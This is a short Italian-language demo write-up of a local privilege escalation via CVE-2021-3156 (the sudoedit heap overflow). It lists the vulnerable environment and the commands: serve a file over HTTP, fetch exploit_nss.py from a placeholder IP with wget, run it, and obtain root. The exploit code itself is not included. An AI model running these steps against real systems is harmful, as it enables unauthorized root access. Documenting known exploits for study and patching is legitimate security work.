
CVE-2021-3156-Exploit-Demo
📅 Data: 2025-06-08
✍️ Autore: @TopskiyPavelQwertyGang
🧠 Ricercatore di sicurezza | Appassionato di Red Team
sudoedit (sudo)Heap-overflow in sudoedit consente a un utente locale di ottenere accesso root
quando si esegue il comando sudoedit con parametri appositamente predisposti.
La vulnerabilità è sfruttabile per le versioni di sudo < 1.9.5p2, incluse le popolari immagini Ubuntu/Debian/CentOS.
Anche con ASLR attivo, la vulnerabilità rimane sfruttabile.
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (уязвим)
ASLR : 2 (включён)
glibc e sudo:ldd --version
sudo --version
python3 -m http.server 80
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
$ python3 exploit_nss.py
# whoami
root
Lo sfruttamento di CVE-2021-3156 rimane possibile anche con ASLR attivo, se glibc ≥ 2.26 e sudo è di una versione vulnerabile.
L'exploit più stabile si è rivelato exploit_nss.py, che funziona al primo tentativo con una corretta configurazione NSS.
🧨 Sistema sotto controllo.